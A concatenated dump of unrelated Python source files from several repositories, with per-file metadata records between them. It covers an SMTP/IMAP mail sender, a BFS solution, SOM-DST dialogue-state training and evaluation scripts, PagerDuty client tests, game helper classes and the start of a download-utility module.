msg['Message-Id'] = make_msgid(None, config['server']['domain'])
msg['Date'] = formatdate(None, True, False)
msg['Email2Chat-Version'] = '1.0'
body = ''
while True:
try:
line = input()
except EOFError:
break
if not line:
break
body = body + line
msg.set_content(body)
S = None
if config['server']['port'] == '465':
S = smtplib.SMTP_SSL(config['server']['hostname'])
S.set_debuglevel(1)
else:
S = smtplib.SMTP(config['server']['hostname'], config['server']['port'])
S.set_debuglevel(1)
S.starttls()
S.login(config['login']['user'], config['login']['password'])
S.send_message(msg)
S.quit()
M = imaplib.IMAP4_SSL(config['server']['hostname'])
M.debug = 4
M.login(config['login']['user'], config['login']['password'])
M.append('Sent', '\Seen', imaplib.Time2Internaldate(time.time()), str(msg).encode('utf-8'))
M.logout()
``` |
{
"source": "jjinho/rosalind",
"score": 4
} |
#### File: rosalind/breadth_first_search/main.py
```python
def main():
n = 0 # number of vertices
m = 0 # number of edges
graph = {}
# Parse in.txt
with open('./in.txt') as f:
for i, line in enumerate(f):
if i == 0:
n, m = (int(x) for x in line.split())
else:
v1, v2 = (int(x) for x in line.split())
if not v1 in graph:
graph[v1] = [v2]
else:
graph[v1].append(v2)
# Distance of the nodes from the root (1)
distances = {x:-1 for x in range(1, n+1)}
# Tell us if the node has been visited
visited = {x:False for x in range(1, n+1)}
# No guarantee that node 1 will be visited
root = sorted(graph.keys())[0]
print(root)
if root == 1:
distances[root] = 0
visited[root] = True
queue = [root]
distance = 0
while queue:
root = queue.pop(0)
if root in graph:
children = graph[root]
for child in children:
if not visited[child]:
visited[child] = True
# This is the key
distances[child] = distances[root] + 1
queue += [child]
for k,v in distances.items():
#print('{0}: {1}'.format(k, v), end=" ")
print(v, end=" ")
print()
if __name__ == '__main__':
main()
``` |
{
"source": "JJinIT/som-dst",
"score": 2
} |
#### File: JJinIT/som-dst/evaluation.py
```python
from utils.data_utils import prepare_dataset, MultiWozDataset
from utils.data_utils import make_slot_meta, domain2id, OP_SET, make_turn_label, postprocessing
from utils.eval_utils import compute_prf, compute_acc, per_domain_join_accuracy
from pytorch_transformers import BertTokenizer, BertConfig
from model import SomDST
import torch.nn as nn
import torch
import torch.nn.functional as F
from torch.utils.data import DataLoader
import random
import numpy as np
import os
import time
import argparse
import json
from copy import deepcopy
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
def main(args):
ontology = json.load(open(os.path.join(args.data_root, args.ontology_data)))
slot_meta, _ = make_slot_meta(ontology)
tokenizer = BertTokenizer(args.vocab_path, do_lower_case=True)
data = prepare_dataset(os.path.join(args.data_root, args.test_data),
tokenizer,
slot_meta, args.n_history, args.max_seq_length, args.op_code)
model_config = BertConfig.from_json_file(args.bert_config_path)
model_config.dropout = 0.1
op2id = OP_SET[args.op_code]
model = SomDST(model_config, len(op2id), len(domain2id), op2id['update'])
ckpt = torch.load(args.model_ckpt_path, map_location='cpu')
model.load_state_dict(ckpt)
model.eval()
model.to(device)
if args.eval_all:
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
False, False, False)
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
False, False, True)
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
False, True, False)
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
False, True, True)
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
True, False, False)
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
True, True, False)
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
True, False, True)
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
True, True, True)
else:
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
args.gt_op, args.gt_p_state, args.gt_gen)
def model_evaluation(model, test_data, tokenizer, slot_meta, epoch, op_code='4',
is_gt_op=False, is_gt_p_state=False, is_gt_gen=False):
model.eval()
op2id = OP_SET[op_code]
id2op = {v: k for k, v in op2id.items()}
id2domain = {v: k for k, v in domain2id.items()}
slot_turn_acc, joint_acc, slot_F1_pred, slot_F1_count = 0, 0, 0, 0
final_joint_acc, final_count, final_slot_F1_pred, final_slot_F1_count = 0, 0, 0, 0
op_acc, op_F1, op_F1_count = 0, {k: 0 for k in op2id}, {k: 0 for k in op2id}
all_op_F1_count = {k: 0 for k in op2id}
tp_dic = {k: 0 for k in op2id}
fn_dic = {k: 0 for k in op2id}
fp_dic = {k: 0 for k in op2id}
results = {}
last_dialog_state = {}
wall_times = []
for di, i in enumerate(test_data):
if i.turn_id == 0:
last_dialog_state = {}
if is_gt_p_state is False:
i.last_dialog_state = deepcopy(last_dialog_state)
i.make_instance(tokenizer, word_dropout=0.)
else: # ground-truth previous dialogue state
last_dialog_state = deepcopy(i.gold_p_state)
i.last_dialog_state = deepcopy(last_dialog_state)
i.make_instance(tokenizer, word_dropout=0.)
input_ids = torch.LongTensor([i.input_id]).to(device)
input_mask = torch.FloatTensor([i.input_mask]).to(device)
segment_ids = torch.LongTensor([i.segment_id]).to(device)
state_position_ids = torch.LongTensor([i.slot_position]).to(device)
d_gold_op, _, _ = make_turn_label(slot_meta, last_dialog_state, i.gold_state,
tokenizer, op_code, dynamic=True)
gold_op_ids = torch.LongTensor([d_gold_op]).to(device)
start = time.perf_counter()
MAX_LENGTH = 9
with torch.no_grad():
# ground-truth state operation
gold_op_inputs = gold_op_ids if is_gt_op else None
d, s, g = model(input_ids=input_ids,
token_type_ids=segment_ids,
state_positions=state_position_ids,
attention_mask=input_mask,
max_value=MAX_LENGTH,
op_ids=gold_op_inputs)
_, op_ids = s.view(-1, len(op2id)).max(-1)
if g.size(1) > 0:
generated = g.squeeze(0).max(-1)[1].tolist()
else:
generated = []
if is_gt_op:
pred_ops = [id2op[a] for a in gold_op_ids[0].tolist()]
else:
pred_ops = [id2op[a] for a in op_ids.tolist()]
gold_ops = [id2op[a] for a in d_gold_op]
if is_gt_gen:
# ground_truth generation
gold_gen = {'-'.join(ii.split('-')[:2]): ii.split('-')[-1] for ii in i.gold_state}
else:
gold_gen = {}
generated, last_dialog_state = postprocessing(slot_meta, pred_ops, last_dialog_state,
generated, tokenizer, op_code, gold_gen)
end = time.perf_counter()
wall_times.append(end - start)
pred_state = []
for k, v in last_dialog_state.items():
pred_state.append('-'.join([k, v]))
if set(pred_state) == set(i.gold_state):
joint_acc += 1
key = str(i.id) + '_' + str(i.turn_id)
results[key] = [pred_state, i.gold_state]
# Compute prediction slot accuracy
temp_acc = compute_acc(set(i.gold_state), set(pred_state), slot_meta)
slot_turn_acc += temp_acc
# Compute prediction F1 score
temp_f1, temp_r, temp_p, count = compute_prf(i.gold_state, pred_state)
slot_F1_pred += temp_f1
slot_F1_count += count
# Compute operation accuracy
temp_acc = sum([1 if p == g else 0 for p, g in zip(pred_ops, gold_ops)]) / len(pred_ops)
op_acc += temp_acc
if i.is_last_turn:
final_count += 1
if set(pred_state) == set(i.gold_state):
final_joint_acc += 1
final_slot_F1_pred += temp_f1
final_slot_F1_count += count
# Compute operation F1 score
for p, g in zip(pred_ops, gold_ops):
all_op_F1_count[g] += 1
if p == g:
tp_dic[g] += 1
op_F1_count[g] += 1
else:
fn_dic[g] += 1
fp_dic[p] += 1
joint_acc_score = joint_acc / len(test_data)
turn_acc_score = slot_turn_acc / len(test_data)
slot_F1_score = slot_F1_pred / slot_F1_count
op_acc_score = op_acc / len(test_data)
final_joint_acc_score = final_joint_acc / final_count
final_slot_F1_score = final_slot_F1_pred / final_slot_F1_count
latency = np.mean(wall_times) * 1000
op_F1_score = {}
for k in op2id.keys():
tp = tp_dic[k]
fn = fn_dic[k]
fp = fp_dic[k]
precision = tp / (tp+fp) if (tp+fp) != 0 else 0
recall = tp / (tp+fn) if (tp+fn) != 0 else 0
F1 = 2 * precision * recall / float(precision + recall) if (precision + recall) != 0 else 0
op_F1_score[k] = F1
print("------------------------------")
print('op_code: %s, is_gt_op: %s, is_gt_p_state: %s, is_gt_gen: %s' % \
(op_code, str(is_gt_op), str(is_gt_p_state), str(is_gt_gen)))
print("Epoch %d joint accuracy : " % epoch, joint_acc_score)
print("Epoch %d slot turn accuracy : " % epoch, turn_acc_score)
print("Epoch %d slot turn F1: " % epoch, slot_F1_score)
print("Epoch %d op accuracy : " % epoch, op_acc_score)
print("Epoch %d op F1 : " % epoch, op_F1_score)
print("Epoch %d op hit count : " % epoch, op_F1_count)
print("Epoch %d op all count : " % epoch, all_op_F1_count)
print("Final Joint Accuracy : ", final_joint_acc_score)
print("Final slot turn F1 : ", final_slot_F1_score)
print("Latency Per Prediction : %f ms" % latency)
print("-----------------------------\n")
json.dump(results, open('preds_%d.json' % epoch, 'w'))
per_domain_join_accuracy(results, slot_meta)
scores = {'epoch': epoch, 'joint_acc': joint_acc_score,
'slot_acc': turn_acc_score, 'slot_f1': slot_F1_score,
'op_acc': op_acc_score, 'op_f1': op_F1_score, 'final_slot_f1': final_slot_F1_score}
return scores
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--data_root", default='data/mwz2.1', type=str)
parser.add_argument("--test_data", default='test_dials.json', type=str)
parser.add_argument("--ontology_data", default='ontology.json', type=str)
parser.add_argument("--vocab_path", default='assets/vocab.txt', type=str)
parser.add_argument("--bert_config_path", default='assets/bert_config_base_uncased.json', type=str)
parser.add_argument("--model_ckpt_path", default='outputs/model_best.bin', type=str)
parser.add_argument("--n_history", default=1, type=int)
parser.add_argument("--max_seq_length", default=256, type=int)
parser.add_argument("--op_code", default="4", type=str)
parser.add_argument("--gt_op", default=False, action='store_true')
parser.add_argument("--gt_p_state", default=False, action='store_true')
parser.add_argument("--gt_gen", default=False, action='store_true')
parser.add_argument("--eval_all", default=False, action='store_true')
args = parser.parse_args()
main(args)
```
#### File: JJinIT/som-dst/train.py
```python
from model import SomDST
from pytorch_transformers import BertTokenizer, AdamW, WarmupLinearSchedule, BertConfig
from utils.data_utils import prepare_dataset, MultiWozDataset
from utils.data_utils import make_slot_meta, domain2id, OP_SET, make_turn_label, postprocessing
from utils.eval_utils import compute_prf, compute_acc, per_domain_join_accuracy
from utils.ckpt_utils import download_ckpt, convert_ckpt_compatible
from evaluation import model_evaluation
import torch
import torch.nn as nn
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
import numpy as np
import argparse
import random
import os
import json
import time
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
def masked_cross_entropy_for_value(logits, target, pad_idx=0):
mask = target.ne(pad_idx)
logits_flat = logits.view(-1, logits.size(-1))
log_probs_flat = torch.log(logits_flat)
target_flat = target.view(-1, 1)
losses_flat = -torch.gather(log_probs_flat, dim=1, index=target_flat)
losses = losses_flat.view(*target.size())
losses = losses * mask.float()
loss = losses.sum() / (mask.sum().float())
return loss
def main(args):
def worker_init_fn(worker_id):
np.random.seed(args.random_seed + worker_id)
n_gpu = 0
if torch.cuda.is_available():
n_gpu = torch.cuda.device_count()
np.random.seed(args.random_seed)
random.seed(args.random_seed)
rng = random.Random(args.random_seed)
torch.manual_seed(args.random_seed)
if n_gpu > 0:
torch.cuda.manual_seed(args.random_seed)
torch.cuda.manual_seed_all(args.random_seed)
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
if not os.path.exists(args.save_dir):
os.mkdir(args.save_dir)
ontology = json.load(open(args.ontology_data))
slot_meta, ontology = make_slot_meta(ontology)
op2id = OP_SET[args.op_code]
print(op2id)
tokenizer = BertTokenizer(args.vocab_path, do_lower_case=True)
train_data_raw = prepare_dataset(data_path=args.train_data_path,
tokenizer=tokenizer,
slot_meta=slot_meta,
n_history=args.n_history,
max_seq_length=args.max_seq_length,
op_code=args.op_code)
train_data = MultiWozDataset(train_data_raw,
tokenizer,
slot_meta,
args.max_seq_length,
rng,
ontology,
args.word_dropout,
args.shuffle_state,
args.shuffle_p)
print("# train examples %d" % len(train_data_raw))
dev_data_raw = prepare_dataset(data_path=args.dev_data_path,
tokenizer=tokenizer,
slot_meta=slot_meta,
n_history=args.n_history,
max_seq_length=args.max_seq_length,
op_code=args.op_code)
print("# dev examples %d" % len(dev_data_raw))
test_data_raw = prepare_dataset(data_path=args.test_data_path,
tokenizer=tokenizer,
slot_meta=slot_meta,
n_history=args.n_history,
max_seq_length=args.max_seq_length,
op_code=args.op_code)
print("# test examples %d" % len(test_data_raw))
model_config = BertConfig.from_json_file(args.bert_config_path)
model_config.dropout = args.dropout
model_config.attention_probs_dropout_prob = args.attention_probs_dropout_prob
model_config.hidden_dropout_prob = args.hidden_dropout_prob
model = SomDST(model_config, len(op2id), len(domain2id), op2id['update'], args.exclude_domain)
if not os.path.exists(args.bert_ckpt_path):
args.bert_ckpt_path = download_ckpt(args.bert_ckpt_path, args.bert_config_path, 'assets')
ckpt = torch.load(args.bert_ckpt_path, map_location='cpu')
model.encoder.bert.load_state_dict(ckpt)
# re-initialize added special tokens ([SLOT], [NULL], [EOS])
model.encoder.bert.embeddings.word_embeddings.weight.data[1].normal_(mean=0.0, std=0.02)
model.encoder.bert.embeddings.word_embeddings.weight.data[2].normal_(mean=0.0, std=0.02)
model.encoder.bert.embeddings.word_embeddings.weight.data[3].normal_(mean=0.0, std=0.02)
model.to(device)
num_train_steps = int(len(train_data_raw) / args.batch_size * args.n_epochs)
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
enc_param_optimizer = list(model.encoder.named_parameters())
enc_optimizer_grouped_parameters = [
{'params': [p for n, p in enc_param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},
{'params': [p for n, p in enc_param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
enc_optimizer = AdamW(enc_optimizer_grouped_parameters, lr=args.enc_lr)
enc_scheduler = WarmupLinearSchedule(enc_optimizer, int(num_train_steps * args.enc_warmup),
t_total=num_train_steps)
dec_param_optimizer = list(model.decoder.parameters())
dec_optimizer = AdamW(dec_param_optimizer, lr=args.dec_lr)
dec_scheduler = WarmupLinearSchedule(dec_optimizer, int(num_train_steps * args.dec_warmup),
t_total=num_train_steps)
if n_gpu > 1:
model = torch.nn.DataParallel(model)
train_sampler = RandomSampler(train_data)
train_dataloader = DataLoader(train_data,
sampler=train_sampler,
batch_size=args.batch_size,
collate_fn=train_data.collate_fn,
num_workers=args.num_workers,
worker_init_fn=worker_init_fn)
loss_fnc = nn.CrossEntropyLoss()
best_score = {'epoch': 0, 'joint_acc': 0, 'op_acc': 0, 'final_slot_f1': 0}
for epoch in range(args.n_epochs):
batch_loss = []
model.train()
for step, batch in enumerate(train_dataloader):
batch = [b.to(device) if not isinstance(b, int) else b for b in batch]
input_ids, input_mask, segment_ids, state_position_ids, op_ids,\
domain_ids, gen_ids, max_value, max_update = batch
if rng.random() < args.decoder_teacher_forcing: # teacher forcing
teacher = gen_ids
else:
teacher = None
domain_scores, state_scores, gen_scores = model(input_ids=input_ids,
token_type_ids=segment_ids,
state_positions=state_position_ids,
attention_mask=input_mask,
max_value=max_value,
op_ids=op_ids,
max_update=max_update,
teacher=teacher)
loss_s = loss_fnc(state_scores.view(-1, len(op2id)), op_ids.view(-1))
loss_g = masked_cross_entropy_for_value(gen_scores.contiguous(),
gen_ids.contiguous(),
tokenizer.vocab['[PAD]'])
loss = loss_s + loss_g
if args.exclude_domain is not True:
loss_d = loss_fnc(domain_scores.view(-1, len(domain2id)), domain_ids.view(-1))
loss = loss + loss_d
batch_loss.append(loss.item())
loss.backward()
enc_optimizer.step()
enc_scheduler.step()
dec_optimizer.step()
dec_scheduler.step()
model.zero_grad()
if step % 100 == 0:
if args.exclude_domain is not True:
print("[%d/%d] [%d/%d] mean_loss : %.3f, state_loss : %.3f, gen_loss : %.3f, dom_loss : %.3f" \
% (epoch+1, args.n_epochs, step,
len(train_dataloader), np.mean(batch_loss),
loss_s.item(), loss_g.item(), loss_d.item()))
else:
print("[%d/%d] [%d/%d] mean_loss : %.3f, state_loss : %.3f, gen_loss : %.3f" \
% (epoch+1, args.n_epochs, step,
len(train_dataloader), np.mean(batch_loss),
loss_s.item(), loss_g.item()))
batch_loss = []
if (epoch+1) % args.eval_epoch == 0:
eval_res = model_evaluation(model, dev_data_raw, tokenizer, slot_meta, epoch+1, args.op_code)
if eval_res['joint_acc'] > best_score['joint_acc']:
best_score = eval_res
model_to_save = model.module if hasattr(model, 'module') else model
save_path = os.path.join(args.save_dir, 'model_best.bin')
torch.save(model_to_save.state_dict(), save_path)
print("Best Score : ", best_score)
print("\n")
print("Test using best model...")
best_epoch = best_score['epoch']
ckpt_path = os.path.join(args.save_dir, 'model_best.bin')
model = SomDST(model_config, len(op2id), len(domain2id), op2id['update'], args.exclude_domain)
ckpt = torch.load(ckpt_path, map_location='cpu')
model.load_state_dict(ckpt)
model.to(device)
model_evaluation(model, test_data_raw, tokenizer, slot_meta, best_epoch, args.op_code,
is_gt_op=False, is_gt_p_state=False, is_gt_gen=False)
model_evaluation(model, test_data_raw, tokenizer, slot_meta, best_epoch, args.op_code,
is_gt_op=False, is_gt_p_state=False, is_gt_gen=True)
model_evaluation(model, test_data_raw, tokenizer, slot_meta, best_epoch, args.op_code,
is_gt_op=False, is_gt_p_state=True, is_gt_gen=False)
model_evaluation(model, test_data_raw, tokenizer, slot_meta, best_epoch, args.op_code,
is_gt_op=False, is_gt_p_state=True, is_gt_gen=True)
model_evaluation(model, test_data_raw, tokenizer, slot_meta, best_epoch, args.op_code,
is_gt_op=True, is_gt_p_state=False, is_gt_gen=False)
model_evaluation(model, test_data_raw, tokenizer, slot_meta, best_epoch, args.op_code,
is_gt_op=True, is_gt_p_state=True, is_gt_gen=False)
model_evaluation(model, test_data_raw, tokenizer, slot_meta, best_epoch, args.op_code,
is_gt_op=True, is_gt_p_state=False, is_gt_gen=True)
model_evaluation(model, test_data_raw, tokenizer, slot_meta, best_epoch, args.op_code,
is_gt_op=True, is_gt_p_state=True, is_gt_gen=True)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument("--data_root", default='data/mwz2.1', type=str)
parser.add_argument("--train_data", default='train_dials.json', type=str)
parser.add_argument("--dev_data", default='dev_dials.json', type=str)
parser.add_argument("--test_data", default='test_dials.json', type=str)
parser.add_argument("--ontology_data", default='ontology.json', type=str)
parser.add_argument("--vocab_path", default='assets/vocab.txt', type=str)
parser.add_argument("--bert_config_path", default='assets/bert_config_base_uncased.json', type=str)
parser.add_argument("--bert_ckpt_path", default='assets/bert-base-uncased-pytorch_model.bin', type=str)
parser.add_argument("--save_dir", default='outputs', type=str)
parser.add_argument("--random_seed", default=42, type=int)
parser.add_argument("--num_workers", default=4, type=int)
parser.add_argument("--batch_size", default=32, type=int)
parser.add_argument("--enc_warmup", default=0.1, type=float)
parser.add_argument("--dec_warmup", default=0.1, type=float)
parser.add_argument("--enc_lr", default=4e-5, type=float)
parser.add_argument("--dec_lr", default=1e-4, type=float)
parser.add_argument("--n_epochs", default=30, type=int)
parser.add_argument("--eval_epoch", default=1, type=int)
parser.add_argument("--op_code", default="4", type=str)
parser.add_argument("--slot_token", default="[SLOT]", type=str)
parser.add_argument("--dropout", default=0.1, type=float)
parser.add_argument("--hidden_dropout_prob", default=0.1, type=float)
parser.add_argument("--attention_probs_dropout_prob", default=0.1, type=float)
parser.add_argument("--decoder_teacher_forcing", default=0.5, type=float)
parser.add_argument("--word_dropout", default=0.1, type=float)
parser.add_argument("--not_shuffle_state", default=False, action='store_true')
parser.add_argument("--shuffle_p", default=0.5, type=float)
parser.add_argument("--n_history", default=1, type=int)
parser.add_argument("--max_seq_length", default=256, type=int)
parser.add_argument("--msg", default=None, type=str)
parser.add_argument("--exclude_domain", default=False, action='store_true')
args = parser.parse_args()
args.train_data_path = os.path.join(args.data_root, args.train_data)
args.dev_data_path = os.path.join(args.data_root, args.dev_data)
args.test_data_path = os.path.join(args.data_root, args.test_data)
args.ontology_data = os.path.join(args.data_root, args.ontology_data)
args.shuffle_state = False if args.not_shuffle_state else True
print('pytorch version: ', torch.__version__)
print(args)
main(args)
``` |
{
"source": "jjinno/pygerduty",
"score": 2
} |
#### File: pygerduty/tests/client_test.py
```python
from __future__ import absolute_import
import httpretty
import pygerduty
import pygerduty.v2
import pytest
###################
# Version 1 Tests #
###################
@httpretty.activate
def test_unknown_subdomain_v1():
httpretty.register_uri(
httpretty.GET, "https://contosso.pagerduty.com/api/v1/users/ABCDEFG",
body='{"error":{"message":"Account Not Found","code":2007}}', status=404)
p = pygerduty.PagerDuty("contosso", "password")
with pytest.raises(pygerduty.NotFound):
p.users.show("ABCDEFG")
###################
# Version 2 Tests #
###################
@httpretty.activate
def test_v2_domain():
httpretty.register_uri(
httpretty.GET, "https://api.pagerduty.com/users/EFGHIJK",
body='{"error": {"message":"API Not found", "code":207}}', status=404)
p = pygerduty.v2.PagerDuty("password")
with pytest.raises(pygerduty.common.NotFound):
p.users.show("EFGHIJK")
``` |
{
"source": "jjinux/pyweek32-neverending",
"score": 3
} |
#### File: pyweek32-neverending/pw32n/enemy_sprites.py
```python
from typing import Any
import arcade
from pw32n import models
class EnemySprite(arcade.Sprite):
def __init__(self, model: models.EnemyModel, *args: Any, **kargs: Any) -> None:
super().__init__(*args, **kargs)
self.model = model
```
#### File: pyweek32-neverending/pw32n/lru_dict.py
```python
from collections import OrderedDict
from typing import TypeVar, Generic
K = TypeVar("K")
V = TypeVar("V")
class LRUDict(Generic[K, V]):
"""This is basically a dict (without the full API) that only remembers a fixed number of things."""
def __init__(self, capacity: int):
self.cache: OrderedDict[K, V] = OrderedDict()
self.capacity = capacity
def get(self, key: K, default: V = None) -> V:
if key not in self.cache:
return default
self.cache.move_to_end(key)
return self.cache[key]
def put(self, key: K, value: V) -> None:
self.cache[key] = value
self.cache.move_to_end(key)
if len(self.cache) > self.capacity:
self.cache.popitem(last=False)
```
#### File: pyweek32-neverending/pw32n/timed_workflow.py
```python
from typing import NamedTuple, Callable
from pw32n.units import Secs
Callback = Callable[[Secs], int]
class TimedStep(NamedTuple):
delay: Secs
callback: Callback
class TimedWorkflow:
"""See TimedWorkflowExample in timed_workflow_test.py."""
def __init__(self, name: str, steps: list[TimedStep]) -> None:
self.name = name
self.steps = steps
self.initial_countdown = self.countdown = Secs(0.0)
self._set_next_countdown()
def on_update(self, delta_time: float) -> None:
if not len(self.steps):
raise ValueError(
f"You forgot to cleanup your workflow; you should do that in your last step: {self}"
)
self.countdown -= delta_time
if self.countdown <= 0.0:
step = self.steps.pop(0)
step.callback(-self.countdown)
self._set_next_countdown()
def _set_next_countdown(self) -> None:
if len(self.steps):
self.initial_countdown = self.countdown = self.steps[0].delay
@property
def completion_ratio_for_current_step(self) -> float:
if self.initial_countdown == 0.0:
return 1.0
return (
self.initial_countdown - max(0.0, self.countdown)
) / self.initial_countdown
``` |
{
"source": "J-JinZhang/CNN_Visualization",
"score": 3
} |
#### File: J-JinZhang/CNN_Visualization/Visualization_im_optim.py
```python
import os
import numpy as np
from PIL import Image
import pandas as pd
import torch
import torchvision
from torch import nn
import torch.nn.functional as F
from torch.optim import Adam
from torchvision.utils import save_image
from resnet import resnet34
from inception_net import Froth_Inception
import matplotlib.pyplot as plt
class TransferIm2TargetIndex():
def __init__(self, model):
self.model = model
self.model.eval()
mean = [0.5561, 0.5706, 0.5491]
std = [0.1833, 0.1916, 0.2061]
self.mean = torch.tensor(mean).unsqueeze(1).unsqueeze(1)
self.std = torch.tensor(std).unsqueeze(1).unsqueeze(1)
self.mean_feed = torch.FloatTensor([8.411431353067606, 0.5473817630918659, 23.97601543147942])
self.std_feed = torch.FloatTensor([0.7960769134313461, 0.05987490652171015, 0.7161782274613697])
def understand_feature_patterns(self, tailing, image, name):
image.requires_grad = True
target = torch.FloatTensor([6.0, 0.5, 24.7])
target = (target - self.mean_feed) / self.std_feed
optimizer = Adam([image], lr=5e-2, weight_decay=1e-6)
for i in range(1, 4001):
optimizer.zero_grad()
# Assign create image to a variable to move forward in the model
out = self.model(tailing.unsqueeze(0), image.unsqueeze(0), name)
print(f"Out: {out.data * self.std_feed + self.mean_feed}")
loss = torch.sum((out - target)**2)
loss.backward()
optimizer.step()
if i % 100 == 0:
im_save = image.data * self.std + self.mean
save_image(im_save, 'generated/regress_vis' + '_iter'+str(i)+'.jpg', normalize=True)
if __name__ == '__main__':
if not os.path.exists('generated'):
os.makedirs('generated')
mean_feed = torch.FloatTensor([8.411431353067606, 0.5473817630918659, 23.97601543147942])
std_feed = torch.FloatTensor([0.7960769134313461, 0.05987490652171015, 0.7161782274613697])
mean_tailing = torch.FloatTensor([1.3901876578758057, 0.48554048370970193, 25.40719649345569])
std_tailing = torch.FloatTensor([0.2688268864000507, 0.03469305624144162, 1.0110712690887271])
transforms = torchvision.transforms.Compose([
torchvision.transforms.CenterCrop(300),
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(mean=[0.5561, 0.5706, 0.5491],
std=[0.1833, 0.1916, 0.2061])])
cnn_layer = 11
filter_pos = 1
name = '3-20160830095333'
img_pil = Image.open(f'Images/{name}.jpg').convert("RGB")
img_tensor = transforms(img_pil)
tailing = (torch.FloatTensor([1.358, 0.505, 26.042]) - mean_tailing) / std_tailing
model = Froth_Inception()
save_file = './saved_models/XRF_InceptionNet_epoch_300.pth'
#model = XRF_ResNet()
#save_file = "./saved_models/XRF_ResNet_epoch_300.pth"
model.load_state_dict(torch.load(save_file))
#layer_vis = CNNLayerVisualization(model.features, cnn_layer, filter_pos) #Froth_Inception包含两部分输入,这里仅采用其features方法
#layer_vis.visualise_layer_with_hooks(img_tensor)
regress_vis = TransferIm2TargetIndex(model)
regress_vis.understand_feature_patterns(tailing, img_tensor, name)
``` |
{
"source": "J-JinZhang/SoftSening",
"score": 2
} |
#### File: J-JinZhang/SoftSening/dataset.py
```python
import torch
import torchvision
from torch.utils.data import Dataset
import numpy as np
from PIL import Image
import pandas as pd
import random
import os
class XRFImg4FeedSet(Dataset):
def __init__(self, root, csv_file, train_mode, clip_mode): # csv_file = 'XRFImgData4FeedRegression.csv'
self.clip_mode = clip_mode
self.root = root
self.df=pd.read_csv(csv_file)
tailing = self.df.iloc[:,0:3].values
feed = self.df.iloc[:,4:7].values
clip = self.df.iloc[:,3].values
mean_tailing = [tailing[:,0].mean(), tailing[:,1].mean(), tailing[:,2].mean()]
std_tailing = [tailing[:,0].std(), tailing[:,1].std(), tailing[:,2].std()]
tailing = (tailing - mean_tailing) / std_tailing
mean_feed = [feed[:,0].mean(), feed[:,1].mean(), feed[:,2].mean()]
std_feed = [feed[:,0].std(), feed[:,1].std(), feed[:,2].std()]
#print(f'mean_feed: {mean_feed} std_feed: {std_feed}')
feed = (feed - mean_feed) / std_feed
index = np.random.RandomState(seed=56).permutation(len(self.df)) #np.random.permutation(len(self.df))
self.tailing = tailing[index,:]
self.feed = feed[index,:]
self.clip = clip[index]
#print(f'self.clip: {self.clip}')
transform = None
if transform is None:
normalize = torchvision.transforms.Normalize(mean=[0.5561, 0.5706, 0.5491],
std=[0.1833, 0.1916, 0.2061])
if train_mode == "train":
self.transforms = torchvision.transforms.Compose([
torchvision.transforms.RandomCrop(300),
torchvision.transforms.ToTensor(),
normalize])
else:
self.transforms = torchvision.transforms.Compose([
torchvision.transforms.CenterCrop(300),
torchvision.transforms.ToTensor(),
normalize])
transform_clip = None
if transform_clip is None:
normalize = torchvision.transforms.Normalize(mean=[0.5429, 0.5580, 0.5357],
std=[0.1841, 0.1923, 0.2079])
self.transform_clip = torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
normalize])
def denormalize4img(self, x_hat):
mean = [0.5561, 0.5706, 0.5491]
std = [0.1833, 0.1916, 0.2061]
mean = torch.tensor(mean).unsqueeze(1).unsqueeze(1)
std = torch.tensor(std).unsqueeze(1).unsqueeze(1)
x = x_hat * std + mean
return x
def __len__(self):
return len(self.clip)
def __getitem__(self, idx):
tailing = torch.tensor( self.tailing[idx,:], dtype=torch.float64 )
truth = torch.tensor( self.feed[idx,:], dtype=torch.float64 )
clip = self.clip[idx]
#print(f'clip: {clip}')
time_stamp = clip[:14]
#print('time_stamp_1: {}'.format(time_stamp))
if self.clip_mode == "single":
file_name = "{}_{}.jpg".format(time_stamp, random.randint(1,10))
full_img_path = os.path.join(self.root, clip, file_name)
images = Image.open(full_img_path).convert("RGB")
images = self.transforms(images)
else:
#print("==> Hello, I am here.")
img_list = torch.FloatTensor(3, 10, 400, 400) # [channels, frames, height, width]
for i in range(1, 11):
file_name = "{}_{}.jpg".format(time_stamp, i)
full_img_path = os.path.join(self.root, clip, file_name)
img = Image.open(full_img_path).convert("RGB")
img_list[:, i-1, :, :] = self.transform_clip(img).float()
top = np.random.randint(0, 100)
left = np.random.randint(0, 100)
images = img_list[:, :, top : top + 300, left : left + 300]
return tailing, images, truth
``` |
{
"source": "jjisnow/pySmartDL",
"score": 3
} |
#### File: pySmartDL/pySmartDL/utils.py
```python
import os
import sys
import urllib.parse
import urllib.request, urllib.parse, urllib.error
import urllib.request, urllib.error, urllib.parse
import random
import logging
import re
from concurrent import futures # if python2, a backport is needed
from math import log
import shutil
def combine_files(parts, dest):
'''
Combines files.
:param parts: Source files.
:type parts: list of strings
:param dest: Destination file.
:type dest: string
'''
chunkSize = 1024 * 1024 * 4
if len(parts) == 1:
shutil.move(parts[0], dest)
else:
with open(dest, 'wb') as output:
for part in parts:
with open(part, 'rb') as input:
data = input.read(chunkSize)
while data:
output.write(data)
data = input.read(chunkSize)
os.remove(part)
def url_fix(s, charset='utf-8'):
'''
Sometimes you get an URL by a user that just isn't a real
URL because it contains unsafe characters like ' ' and so on. This
function can fix some of the problems in a similar way browsers
handle data entered by the user:
>>> url_fix(u'http://de.wikipedia.org/wiki/Elf (Begriffsklärung)')
'http://de.wikipedia.org/wiki/Elf%20%28Begriffskl%C3%A4rung%29'
